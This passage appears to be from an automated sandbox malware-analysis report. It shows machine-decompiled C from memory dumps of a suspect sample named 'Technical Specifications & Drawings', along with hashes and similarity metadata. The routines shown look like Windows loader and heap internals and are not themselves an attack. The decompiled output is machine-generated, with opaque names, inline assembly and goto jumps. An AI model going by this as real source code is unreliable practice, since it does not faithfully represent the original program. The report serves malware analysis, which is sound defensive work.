                                                  						_push(3);
                                                  						_push(_t179);
                                                  						_push(0xffffffff);
                                                  						if(E017E9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                                                  							_push(_t139);
                                                  							E0186A80D(_t179, 1, _v40, 0);
                                                  							_t172 = 4;
                                                  						}
                                                  					}
                                                  					_t141 =  &_v72;
                                                  					if(E0186A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                                                  						_v64 = _a4;
                                                  						_t94 =  *(_t179 + 0xc) & 0x40000000;
                                                  						asm("sbb edi, edi");
                                                  						_t176 = ( ~_t94 & 0x0000003c) + 4;
                                                  						if(_t94 != 0) {
                                                  							_push(0);
                                                  							_push(0x14);
                                                  							_push( &_v24);
                                                  							_push(3);
                                                  							_push(_t179);
                                                  							_push(0xffffffff);
                                                  							if(E017E9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                                                  								_push(_t141);
                                                  								E0186A80D(_t179, 1, _v20, 0);
                                                  								_t176 = 4;
                                                  							}
                                                  						}
                                                  						if(E0186A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                                                  							goto L11;
                                                  						} else {
                                                  							_t177 = _v64;
                                                  							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                                                  							_t100 = _v52 + _v52;
                                                  							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                                                  							 *(_t132 + 0x10) = _t146;
                                                  							asm("bsf eax, [esp+0x18]");
                                                  							_v52 = _t100;
                                                  							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                                                  							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                                                  							_t47 =  &_a8;
                                                  							 *_t47 = _a8 & 0x00000001;
                                                  							if( *_t47 == 0) {
                                                  								E017C2280(_t179 + 0x30, _t179 + 0x30);
                                                  							}
                                                  							_t147 =  *(_t179 + 0x34);
                                                  							_t159 =  *(_t179 + 0x38) & 1;
                                                  							_v68 = 0;
                                                  							if(_t147 == 0) {
                                                  								L35:
                                                  								E017BB090(_t179 + 0x34, _t147, _v68, _t132);
                                                  								if(_a8 == 0) {
                                                  									E017BFFB0(_t132, _t177, _t179 + 0x30);
                                                  								}
                                                  								asm("lock xadd [eax], ecx");
                                                  								asm("lock xadd [eax], edx");
                                                  								_t132 = 0;
                                                  								_v72 = _v72 & 0;
                                                  								_v68 = _v72;
                                                  								if(E017C7D50() == 0) {
                                                  									_t113 = 0x7ffe0388;
                                                  								} else {
                                                  									_t177 = _v64;
                                                  									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                  								}
                                                  								if( *_t113 == _t132) {
                                                  									_t166 = _v68;
                                                  									goto L46;
                                                  								} else {
                                                  									_t166 = _v68;
                                                  									E0185FEC0(_t132, _t179, _t166, _t177 + 0x1000);
                                                  									goto L12;
                                                  								}
                                                  							} else {
                                                  								L23:
                                                  								while(1) {
                                                  									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                                                  										_t122 =  *_t147;
                                                  										if(_t159 == 0) {
                                                  											L32:
                                                  											if(_t122 == 0) {
                                                  												L34:
                                                  												_v68 = 0;
                                                  												goto L35;
                                                  											}
                                                  											L33:
                                                  											_t147 = _t122;
                                                  											continue;
                                                  										}
                                                  										if(_t122 == 0) {
                                                  											goto L34;
                                                  										}
                                                  										_t122 = _t122 ^ _t147;
                                                  										goto L32;
                                                  									}
                                                  									_t122 =  *(_t147 + 4);
                                                  									if(_t159 == 0) {
                                                  										L27:
                                                  										if(_t122 != 0) {
                                                  											goto L33;
                                                  										}
                                                  										L28:
                                                  										_v68 = 1;
                                                  										goto L35;
                                                  									}
                                                  									if(_t122 == 0) {
                                                  										goto L28;
                                                  									}
                                                  									_t122 = _t122 ^ _t147;
                                                  									goto L27;
                                                  								}
                                                  							}
                                                  						}
                                                  					}
                                                  					_v72 = _v72 & 0x00000000;
                                                  					goto L11;
                                                  				}
                                                  			}


                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: `$`
                                                  • API String ID: 0-197956300
                                                  • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                  • Instruction ID: b75a7ac0a7951a91b8104795e1e21f79f81878431385b116c4126f03d84f640c
                                                  • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                  • Instruction Fuzzy Hash: 34919F752043429FE725CE29C845B1BBBEABF84714F14892DFA95CB280E774EA04CB52
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 77%
                                                  			E018251BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                  				signed short* _t63;
                                                  				signed int _t64;
                                                  				signed int _t65;
                                                  				signed int _t67;
                                                  				intOrPtr _t74;
                                                  				intOrPtr _t84;
                                                  				intOrPtr _t88;
                                                  				intOrPtr _t94;
                                                  				void* _t100;
                                                  				void* _t103;
                                                  				intOrPtr _t105;
                                                  				signed int _t106;
                                                  				short* _t108;
                                                  				signed int _t110;
                                                  				signed int _t113;
                                                  				signed int* _t115;
                                                  				signed short* _t117;
                                                  				void* _t118;
                                                  				void* _t119;
                                                  
                                                  				_push(0x80);
                                                  				_push(0x18805f0);
                                                  				E017FD0E8(__ebx, __edi, __esi);
                                                  				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                                                  				_t115 =  *(_t118 + 0xc);
                                                  				 *(_t118 - 0x7c) = _t115;
                                                  				 *((char*)(_t118 - 0x65)) = 0;
                                                  				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                  				_t113 = 0;
                                                  				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                                                  				 *((intOrPtr*)(_t118 - 4)) = 0;
                                                  				_t100 = __ecx;
                                                  				if(_t100 == 0) {
                                                  					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                  					E017BEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                  					 *((char*)(_t118 - 0x65)) = 1;
                                                  					_t63 =  *(_t118 - 0x90);
                                                  					_t101 = _t63[2];
                                                  					_t64 =  *_t63 & 0x0000ffff;
                                                  					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                  					L20:
                                                  					_t65 = _t64 >> 1;
                                                  					L21:
                                                  					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                                                  					if(_t108 == 0) {
                                                  						L27:
                                                  						 *_t115 = _t65 + 1;
                                                  						_t67 = 0xc0000023;
                                                  						L28:
                                                  						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                                                  						L29:
                                                  						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                                                  						E018253CA(0);
                                                  						return E017FD130(0, _t113, _t115);
                                                  					}
                                                  					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                                                  						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                                                  							 *_t108 = 0;
                                                  						}
                                                  						goto L27;
                                                  					}
                                                  					 *_t115 = _t65;
                                                  					_t115 = _t65 + _t65;
                                                  					E017EF3E0(_t108, _t101, _t115);
                                                  					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                                                  					_t67 = 0;
                                                  					goto L28;
                                                  				}
                                                  				_t103 = _t100 - 1;
                                                  				if(_t103 == 0) {
                                                  					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                                                  					_t74 = E017C3690(1, _t117, 0x1781810, _t118 - 0x74);
                                                  					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                                                  					_t101 = _t117[2];
                                                  					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                  					if(_t74 < 0) {
                                                  						_t64 =  *_t117 & 0x0000ffff;
                                                  						_t115 =  *(_t118 - 0x7c);
                                                  						goto L20;
                                                  					}
                                                  					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                                                  					_t115 =  *(_t118 - 0x7c);
                                                  					goto L21;
                                                  				}
                                                  				if(_t103 == 1) {
                                                  					_t105 = 4;
                                                  					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                                                  					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                                                  					_push(_t118 - 0x70);
                                                  					_push(0);
                                                  					_push(0);
                                                  					_push(_t105);
                                                  					_push(_t118 - 0x78);
                                                  					_push(0x6b);
                                                  					 *((intOrPtr*)(_t118 - 0x64)) = E017EAA90();
                                                  					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                  					_t113 = L017C4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                                                  					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                                                  					if(_t113 != 0) {
                                                  						_push(_t118 - 0x70);
                                                  						_push( *((intOrPtr*)(_t118 - 0x70)));
                                                  						_push(_t113);
                                                  						_push(4);
                                                  						_push(_t118 - 0x78);
                                                  						_push(0x6b);
                                                  						_t84 = E017EAA90();
                                                  						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                                                  						if(_t84 < 0) {
                                                  							goto L29;
                                                  						}
                                                  						_t110 = 0;
                                                  						_t106 = 0;
                                                  						while(1) {
                                                  							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                                                  							 *(_t118 - 0x88) = _t106;
                                                  							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                                                  								break;
                                                  							}
                                                  							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                                                  							_t106 = _t106 + 1;
                                                  						}
                                                  						_t88 = E0182500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                                                  						_t119 = _t119 + 0x1c;
                                                  						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                                                  						if(_t88 < 0) {
                                                  							goto L29;
                                                  						}
                                                  						_t101 = _t118 - 0x3c;
                                                  						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                                                  						goto L21;
                                                  					}
                                                  					_t67 = 0xc0000017;
                                                  					goto L28;
                                                  				}
                                                  				_push(0);
                                                  				_push(0x20);
                                                  				_push(_t118 - 0x60);
                                                  				_push(0x5a);
                                                  				_t94 = E017E9860();
                                                  				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                                                  				if(_t94 < 0) {
                                                  					goto L29;
                                                  				}
                                                  				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                                                  					_t101 = L"Legacy";
                                                  					_push(6);
                                                  				} else {
                                                  					_t101 = L"UEFI";
                                                  					_push(4);
                                                  				}
                                                  				_pop(_t65);
                                                  				goto L21;
                                                  			}























                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID: Legacy$UEFI
                                                  • API String ID: 2994545307-634100481
                                                  • Opcode ID: cbd350152f0d8866a0624bdf571deb015cbebb345aa7a7713c572392df06f987
                                                  • Instruction ID: 008318ce3e15eef821459af737733174a08b5b851112c97771b97861ac569822
                                                  • Opcode Fuzzy Hash: cbd350152f0d8866a0624bdf571deb015cbebb345aa7a7713c572392df06f987
                                                  • Instruction Fuzzy Hash: 665190B1A807199FDB26DFA8C844BEDBBF8FF49700F14402DE649EB291D6709A40CB10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 87%
                                                  			E017BD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
                                                  				signed int _v8;
                                                  				intOrPtr _v20;
                                                  				signed int _v36;
                                                  				intOrPtr* _v40;
                                                  				signed int _v44;
                                                  				signed int _v48;
                                                  				signed char _v52;
                                                  				signed int _v60;
                                                  				signed int _v64;
                                                  				signed int _v68;
                                                  				signed int _v72;
                                                  				signed int _v76;
                                                  				intOrPtr _v80;
                                                  				signed int _v84;
                                                  				intOrPtr _v100;
                                                  				intOrPtr _v104;
                                                  				signed int _v108;
                                                  				signed int _v112;
                                                  				signed int _v116;
                                                  				intOrPtr _v120;
                                                  				signed int _v132;
                                                  				char _v140;
                                                  				char _v144;
                                                  				char _v157;
                                                  				signed int _v164;
                                                  				signed int _v168;
                                                  				signed int _v169;
                                                  				intOrPtr _v176;
                                                  				signed int _v180;
                                                  				signed int _v184;
                                                  				intOrPtr _v188;
                                                  				signed int _v192;
                                                  				signed int _v200;
                                                  				signed int _v208;
                                                  				intOrPtr* _v212;
                                                  				char _v216;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* __ebp;
                                                  				signed int _t204;
                                                  				signed int _t206;
                                                  				void* _t208;
                                                  				signed int _t211;
                                                  				signed int _t216;
                                                  				intOrPtr _t217;
                                                  				intOrPtr* _t218;
                                                  				signed int _t226;
                                                  				signed int _t239;
                                                  				signed int* _t247;
                                                  				signed int _t249;
                                                  				void* _t252;
                                                  				signed int _t256;
                                                  				signed int _t269;
                                                  				signed int _t271;
                                                  				signed int _t277;
                                                  				signed int _t279;
                                                  				intOrPtr _t283;
                                                  				signed int _t287;
                                                  				signed int _t288;
                                                  				void* _t289;
                                                  				signed char _t290;
                                                  				signed int _t292;
                                                  				signed int* _t293;
                                                  				unsigned int _t297;
                                                  				signed int _t306;
                                                  				signed int _t307;
                                                  				signed int _t308;
                                                  				signed int _t309;
                                                  				signed int _t310;
                                                  				intOrPtr _t311;
                                                  				intOrPtr _t312;
                                                  				signed int _t319;
                                                  				signed int _t320;
                                                  				signed int* _t324;
                                                  				signed int _t337;
                                                  				signed int _t338;
                                                  				signed int _t339;
                                                  				signed int* _t340;
                                                  				void* _t341;
                                                  				signed int _t344;
                                                  				signed int _t348;
                                                  				signed int _t349;
                                                  				signed int _t351;
                                                  				intOrPtr _t353;
                                                  				void* _t354;
                                                  				signed int _t356;
                                                  				signed int _t358;
                                                  				intOrPtr _t359;
                                                  				signed int _t361;
                                                  				signed int _t363;
                                                  				signed short* _t365;
                                                  				void* _t367;
                                                  				intOrPtr _t369;
                                                  				void* _t370;
                                                  				signed int _t371;
                                                  				signed int _t372;
                                                  				void* _t374;
                                                  				signed int _t376;
                                                  				void* _t384;
                                                  				signed int _t387;
                                                  
                                                  				_v8 =  *0x189d360 ^ _t376;
                                                  				_t2 =  &_a20;
                                                  				 *_t2 = _a20 & 0x00000001;
                                                  				_t287 = _a4;
                                                  				_v200 = _a12;
                                                  				_t365 = _a8;
                                                  				_v212 = _a16;
                                                  				_v180 = _a24;
                                                  				_v168 = 0;
                                                  				_v157 = 0;
                                                  				if( *_t2 != 0) {
                                                  					__eflags = E017B6600(0x18952d8);
                                                  					if(__eflags == 0) {
                                                  						goto L1;
                                                  					} else {
                                                  						_v188 = 6;
                                                  					}
                                                  				} else {
                                                  					L1:
                                                  					_v188 = 9;
                                                  				}
                                                  				if(_t365 == 0) {
                                                  					_v164 = 0;
                                                  					goto L5;
                                                  				} else {
                                                  					_t363 =  *_t365 & 0x0000ffff;
                                                  					_t341 = _t363 + 1;
                                                  					if((_t365[1] & 0x0000ffff) < _t341) {
                                                  						L109:
                                                  						__eflags = _t341 - 0x80;
                                                  						if(_t341 <= 0x80) {
                                                  							_t281 =  &_v140;
                                                  							_v164 =  &_v140;
                                                  							goto L114;
                                                  						} else {
                                                  							_t283 =  *0x1897b9c; // 0x0
                                                  							_t281 = L017C4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
                                                  							_v164 = _t281;
                                                  							__eflags = _t281;
                                                  							if(_t281 != 0) {
                                                  								_v157 = 1;
                                                  								L114:
                                                  								E017EF3E0(_t281, _t365[2], _t363);
                                                  								_t200 = _v164;
                                                  								 *((char*)(_v164 + _t363)) = 0;
                                                  								goto L5;
                                                  							} else {
                                                  								_t204 = 0xc000009a;
                                                  								goto L47;
                                                  							}
                                                  						}
                                                  					} else {
                                                  						_t200 = _t365[2];
                                                  						_v164 = _t200;
                                                  						if( *((char*)(_t200 + _t363)) != 0) {
                                                  							goto L109;
                                                  						} else {
                                                  							while(1) {
                                                  								L5:
                                                  								_t353 = 0;
                                                  								_t342 = 0x1000;
                                                  								_v176 = 0;
                                                  								if(_t287 == 0) {
                                                  									break;
                                                  								}
                                                  								_t384 = _t287 -  *0x1897b90; // 0x77460000
                                                  								if(_t384 == 0) {
                                                  									_t353 =  *0x1897b8c; // 0x1262aa8
                                                  									_v176 = _t353;
                                                  									_t320 = ( *(_t353 + 0x50))[8];
                                                  									_v184 = _t320;
                                                  								} else {
                                                  									E017C2280(_t200, 0x18984d8);
                                                  									_t277 =  *0x18985f4; // 0x1262f98
                                                  									_t351 =  *0x18985f8 & 1;
                                                  									while(_t277 != 0) {
                                                  										_t337 =  *(_t277 - 0x50);
                                                  										if(_t337 > _t287) {
                                                  											_t338 = _t337 | 0xffffffff;
                                                  										} else {
                                                  											asm("sbb ecx, ecx");
                                                  											_t338 =  ~_t337;
                                                  										}
                                                  										_t387 = _t338;
                                                  										if(_t387 < 0) {
                                                  											_t339 =  *_t277;
                                                  											__eflags = _t351;
                                                  											if(_t351 != 0) {
                                                  												__eflags = _t339;
                                                  												if(_t339 == 0) {
                                                  													goto L16;
                                                  												} else {
                                                  													goto L118;
                                                  												}
                                                  												goto L151;
                                                  											} else {
                                                  												goto L16;
                                                  											}
                                                  											goto L17;
                                                  										} else {
                                                  											if(_t387 <= 0) {
                                                  												__eflags = _t277;
                                                  												if(_t277 != 0) {
                                                  													_t340 =  *(_t277 - 0x18);
                                                  													_t24 = _t277 - 0x68; // 0x1262f30
                                                  													_t353 = _t24;
                                                  													_v176 = _t353;
                                                  													__eflags = _t340[3] - 0xffffffff;
                                                  													if(_t340[3] != 0xffffffff) {
                                                  														_t279 =  *_t340;
                                                  														__eflags =  *(_t279 - 0x20) & 0x00000020;
                                                  														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
                                                  															asm("lock inc dword [edi+0x9c]");
                                                  															_t340 =  *(_t353 + 0x50);
                                                  														}
                                                  													}
                                                  													_v184 = _t340[8];
                                                  												}
                                                  											} else {
                                                  												_t339 =  *(_t277 + 4);
                                                  												if(_t351 != 0) {
                                                  													__eflags = _t339;
                                                  													if(_t339 == 0) {
                                                  														goto L16;
                                                  													} else {
                                                  														L118:
                                                  														_t277 = _t277 ^ _t339;
                                                  														goto L17;
                                                  													}
                                                  													goto L151;
                                                  												} else {
                                                  													L16:
                                                  													_t277 = _t339;
                                                  												}
                                                  												goto L17;
                                                  											}
                                                  										}
                                                  										goto L25;
                                                  										L17:
                                                  									}
                                                  									L25:
                                                  									E017BFFB0(_t287, _t353, 0x18984d8);
                                                  									_t320 = _v184;
                                                  									_t342 = 0x1000;
                                                  								}
                                                  								if(_t353 == 0) {
                                                  									break;
                                                  								} else {
                                                  									_t366 = 0;
                                                  									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
                                                  										_t288 = _v164;
                                                  										if(_t353 != 0) {
                                                  											_t342 = _t288;
                                                  											_t374 = E017FCC99(_t353, _t288, _v200, 1,  &_v168);
                                                  											if(_t374 >= 0) {
                                                  												if(_v184 == 7) {
                                                  													__eflags = _a20;
                                                  													if(__eflags == 0) {
                                                  														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
                                                  														if(__eflags != 0) {
                                                  															_t271 = E017B6600(0x18952d8);
                                                  															__eflags = _t271;
                                                  															if(__eflags == 0) {
                                                  																_t342 = 0;
                                                  																_v169 = _t271;
                                                  																_t374 = E017B7926( *(_t353 + 0x50), 0,  &_v169);
                                                  															}
                                                  														}
                                                  													}
                                                  												}
                                                  												if(_t374 < 0) {
                                                  													_v168 = 0;
                                                  												} else {
                                                  													if( *0x189b239 != 0) {
                                                  														_t342 =  *(_t353 + 0x18);
                                                  														E0182E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
                                                  													}
                                                  													if( *0x1898472 != 0) {
                                                  														_v192 = 0;
                                                  														_t342 =  *0x7ffe0330;
                                                  														_t361 =  *0x189b218; // 0x0
                                                  														asm("ror edi, cl");
                                                  														 *0x189b1e0( &_v192, _t353, _v168, 0, _v180);
                                                  														 *(_t361 ^  *0x7ffe0330)();
                                                  														_t269 = _v192;
                                                  														_t353 = _v176;
                                                  														__eflags = _t269;
                                                  														if(__eflags != 0) {
                                                  															_v168 = _t269;
                                                  														}
                                                  													}
                                                  												}
                                                  											}
                                                  											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
                                                  												_t366 = 0xc000007a;
                                                  											}
                                                  											_t247 =  *(_t353 + 0x50);
                                                  											if(_t247[3] == 0xffffffff) {
                                                  												L40:
                                                  												if(_t366 == 0xc000007a) {
                                                  													__eflags = _t288;
                                                  													if(_t288 == 0) {
                                                  														goto L136;
                                                  													} else {
                                                  														_t366 = 0xc0000139;
                                                  													}
                                                  													goto L54;
                                                  												}
                                                  											} else {
                                                  												_t249 =  *_t247;
                                                  												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
                                                  													goto L40;
                                                  												} else {
                                                  													_t250 = _t249 | 0xffffffff;
                                                  													asm("lock xadd [edi+0x9c], eax");
                                                  													if((_t249 | 0xffffffff) == 0) {
                                                  														E017C2280(_t250, 0x18984d8);
                                                  														_t342 =  *(_t353 + 0x54);
                                                  														_t165 = _t353 + 0x54; // 0x54
                                                  														_t252 = _t165;
                                                  														__eflags =  *(_t342 + 4) - _t252;
                                                  														if( *(_t342 + 4) != _t252) {
                                                  															L135:
                                                  															asm("int 0x29");
                                                  															L136:
                                                  															_t288 = _v200;
                                                  															_t366 = 0xc0000138;
                                                  															L54:
                                                  															_t342 = _t288;
                                                  															L017E3898(0, _t288, _t366);
                                                  														} else {
                                                  															_t324 =  *(_t252 + 4);
                                                  															__eflags =  *_t324 - _t252;
                                                  															if( *_t324 != _t252) {
                                                  																goto L135;
                                                  															} else {
                                                  																 *_t324 = _t342;
                                                  																 *(_t342 + 4) = _t324;
                                                  																_t293 =  *(_t353 + 0x50);
                                                  																_v180 =  *_t293;
                                                  																E017BFFB0(_t293, _t353, 0x18984d8);
                                                  																__eflags =  *((short*)(_t353 + 0x3a));
                                                  																if( *((short*)(_t353 + 0x3a)) != 0) {
                                                  																	_t342 = 0;
                                                  																	__eflags = 0;
                                                  																	E017E37F5(_t353, 0);
                                                  																}
                                                  																E017E0413(_t353);
                                                  																_t256 =  *(_t353 + 0x48);
                                                  																__eflags = _t256;
                                                  																if(_t256 != 0) {
                                                  																	__eflags = _t256 - 0xffffffff;
                                                  																	if(_t256 != 0xffffffff) {
                                                  																		E017D9B10(_t256);
                                                  																	}
                                                  																}
                                                  																__eflags =  *(_t353 + 0x28);
                                                  																if( *(_t353 + 0x28) != 0) {
                                                  																	_t174 = _t353 + 0x24; // 0x24
                                                  																	E017D02D6(_t174);
                                                  																}
                                                  																L017C77F0( *0x1897b98, 0, _t353);
                                                  																__eflags = _v180 - _t293;
                                                  																if(__eflags == 0) {
                                                  																	E017DC277(_t293, _t366);
                                                  																}
                                                  																_t288 = _v164;
                                                  																goto L40;
                                                  															}
                                                  														}
                                                  													} else {
                                                  														goto L40;
                                                  													}
                                                  												}
                                                  											}
                                                  										}
                                                  									} else {
                                                  										L017BEC7F(_t353);
                                                  										L017D19B8(_t287, 0, _t353, 0);
                                                  										_t200 = E017AF4E3(__eflags);
                                                  										continue;
                                                  									}
                                                  								}
                                                  								L41:
                                                  								if(_v157 != 0) {
                                                  									L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
                                                  								}
                                                  								if(_t366 < 0) {
                                                  									L46:
                                                  									 *_v212 = _v168;
                                                  									_t204 = _t366;
                                                  									L47:
                                                  									_pop(_t354);
                                                  									_pop(_t367);
                                                  									_pop(_t289);
                                                  									return E017EB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
                                                  								} else {
                                                  									_t206 =  *0x189b2f8; // 0x0
                                                  									if((_t206 |  *0x189b2fc) == 0 || ( *0x189b2e4 & 0x00000001) != 0) {
                                                  										goto L46;
                                                  									} else {
                                                  										_t297 =  *0x189b2ec; // 0x0
                                                  										_v200 = 0;
                                                  										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
                                                  											_t355 = _v168;
                                                  											_t342 =  &_v208;
                                                  											_t208 = E01856B68(_v168,  &_v208, _v168, __eflags);
                                                  											__eflags = _t208 - 1;
                                                  											if(_t208 == 1) {
                                                  												goto L46;
                                                  											} else {
                                                  												__eflags = _v208 & 0x00000010;
                                                  												if((_v208 & 0x00000010) == 0) {
                                                  													goto L46;
                                                  												} else {
                                                  													_t342 = 4;
                                                  													_t366 = E01856AEB(_t355, 4,  &_v216);
                                                  													__eflags = _t366;
                                                  													if(_t366 >= 0) {
                                                  														goto L46;
                                                  													} else {
                                                  														asm("int 0x29");
                                                  														_t356 = 0;
                                                  														_v44 = 0;
                                                  														_t290 = _v52;
                                                  														__eflags = 0;
                                                  														if(0 == 0) {
                                                  															L108:
                                                  															_t356 = 0;
                                                  															_v44 = 0;
                                                  															goto L63;
                                                  														} else {
                                                  															__eflags = 0;
                                                  															if(0 < 0) {
                                                  																goto L108;
                                                  															}
                                                  															L63:
                                                  															_v112 = _t356;
                                                  															__eflags = _t356;
                                                  															if(_t356 == 0) {
                                                  																L143:
                                                  																_v8 = 0xfffffffe;
                                                  																_t211 = 0xc0000089;
                                                  															} else {
                                                  																_v36 = 0;
                                                  																_v60 = 0;
                                                  																_v48 = 0;
                                                  																_v68 = 0;
                                                  																_v44 = _t290 & 0xfffffffc;
                                                  																E017BE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
                                                  																_t306 = _v68;
                                                  																__eflags = _t306;
                                                  																if(_t306 == 0) {
                                                  																	_t216 = 0xc000007b;
                                                  																	_v36 = 0xc000007b;
                                                  																	_t307 = _v60;
                                                  																} else {
                                                  																	__eflags = _t290 & 0x00000001;
                                                  																	if(__eflags == 0) {
                                                  																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
                                                  																		__eflags = _t349 - 0x10b;
                                                  																		if(_t349 != 0x10b) {
                                                  																			__eflags = _t349 - 0x20b;
                                                  																			if(_t349 == 0x20b) {
                                                  																				goto L102;
                                                  																			} else {
                                                  																				_t307 = 0;
                                                  																				_v48 = 0;
                                                  																				_t216 = 0xc000007b;
                                                  																				_v36 = 0xc000007b;
                                                  																				goto L71;
                                                  																			}
                                                  																		} else {
                                                  																			L102:
                                                  																			_t307 =  *(_t306 + 0x50);
                                                  																			goto L69;
                                                  																		}
                                                  																		goto L151;
                                                  																	} else {
                                                  																		_t239 = L017BEAEA(_t290, _t290, _t356, _t366, __eflags);
                                                  																		_t307 = _t239;
                                                  																		_v60 = _t307;
                                                  																		_v48 = _t307;
                                                  																		__eflags = _t307;
                                                  																		if(_t307 != 0) {
                                                  																			L70:
                                                  																			_t216 = _v36;
                                                  																		} else {
                                                  																			_push(_t239);
                                                  																			_push(0x14);
                                                  																			_push( &_v144);
                                                  																			_push(3);
                                                  																			_push(_v44);
                                                  																			_push(0xffffffff);
                                                  																			_t319 = E017E9730();
                                                  																			_v36 = _t319;
                                                  																			__eflags = _t319;
                                                  																			if(_t319 < 0) {
                                                  																				_t216 = 0xc000001f;
                                                  																				_v36 = 0xc000001f;
                                                  																				_t307 = _v60;
                                                  																			} else {
                                                  																				_t307 = _v132;
                                                  																				L69:
                                                  																				_v48 = _t307;
                                                  																				goto L70;
                                                  																			}
                                                  																		}
                                                  																	}
                                                  																}
                                                  																L71:
                                                  																_v72 = _t307;
                                                  																_v84 = _t216;
                                                  																__eflags = _t216 - 0xc000007b;
                                                  																if(_t216 == 0xc000007b) {
                                                  																	L150:
                                                  																	_v8 = 0xfffffffe;
                                                  																	_t211 = 0xc000007b;
                                                  																} else {
                                                  																	_t344 = _t290 & 0xfffffffc;
                                                  																	_v76 = _t344;
                                                  																	__eflags = _v40 - _t344;
                                                  																	if(_v40 <= _t344) {
                                                  																		goto L150;
                                                  																	} else {
                                                  																		__eflags = _t307;
                                                  																		if(_t307 == 0) {
                                                  																			L75:
                                                  																			_t217 = 0;
                                                  																			_v104 = 0;
                                                  																			__eflags = _t366;
                                                  																			if(_t366 != 0) {
                                                  																				__eflags = _t290 & 0x00000001;
                                                  																				if((_t290 & 0x00000001) != 0) {
                                                  																					_t217 = 1;
                                                  																					_v104 = 1;
                                                  																				}
                                                  																				_t290 = _v44;
                                                  																				_v52 = _t290;
